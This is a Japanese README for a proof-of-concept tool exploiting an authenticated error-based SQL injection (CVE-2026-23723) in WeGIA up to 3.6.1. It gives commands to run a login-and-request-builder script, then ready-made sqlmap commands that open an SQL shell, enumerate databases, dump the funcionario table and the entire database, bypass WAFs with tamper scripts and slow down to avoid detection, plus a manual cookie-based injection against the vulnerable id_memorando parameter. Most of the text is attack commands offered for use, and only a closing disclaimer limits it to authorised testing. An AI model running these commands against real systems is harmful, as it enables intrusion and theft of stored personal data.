
これは、WeGIA(≤ 3.6.1)における認証済みエラーベースSQLインジェクションの脆弱性(GHSA-xfmp-2hf9-gfjpとして識別)向けに、sqlmap互換のPoCファイル生成を自動化するために設計された軽量なPythonヘルパースクリプトです。
WeGIA ≤ 3.6.1 における認証済みエラーベースSQLインジェクション
GHSA-xfmp-2hf9-gfjp | 公式アドバイザリ
PoC 原作者 / 報告者: ViniCastro2001 GHSA 公開者: nilsonLazarin(プロジェクトメンテナー)
この軽量Pythonスクリプトは以下を自動化します:
id_memorando=1* としてマーク)--sql-shell)requests ライブラリ(ほとんどのペネトレーションテスト環境には既にインストール済み)git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC
# 推奨: 対話型パスワードプロンプト
python CVE-2026-23723.py --url http://target.com -u admin
# パスワードを直接指定
python CVE-2026-23723.py --url http://target.com -u admin -p wegia
# カスタム出力ファイル
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req
正常に実行されると、スクリプトは以下を行います:
ログインを試行 wegia_sqlmap.req(またはカスタムファイル名)を生成 すぐに使用できるsqlmapコマンドを表示
# 1. 対話型MySQLライクシェル(最も推奨)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb
# 2. 現在のデータベースと全データベースを表示
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch
# 3. wegiaデータベース内のテーブル一覧を表示
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch
# 4. 特定のテーブルをダンプ(例: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch
# 5. wegiaデータベース全体をダンプ(注意!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
任意のsqlmapフラグ:
--proxy=http://127.0.0.1:8080 (Burp/ZAP経由)
--tamper=space2comment,randomcase (基本的なWAFバイパス)
--delay=1 (検出を避けるために速度を落とす)
自動ログインが失敗する場合 ブラウザで手動ログイン → 完全なCookieヘッダーをコピー → sqlmapを直接実行:
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
--cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
--sql-shell --batch
法的免責事項 このPoCは教育目的および許可されたペネトレーションテスト目的のみで提供されています。 許可なくシステムに対して使用することは違法であり、禁止されています。 著者および貢献者は、誤用または生じたいかなる損害についても責任を負いません。 参考文献
GHSA-xfmp-2hf9-gfjp CVE-2026-23723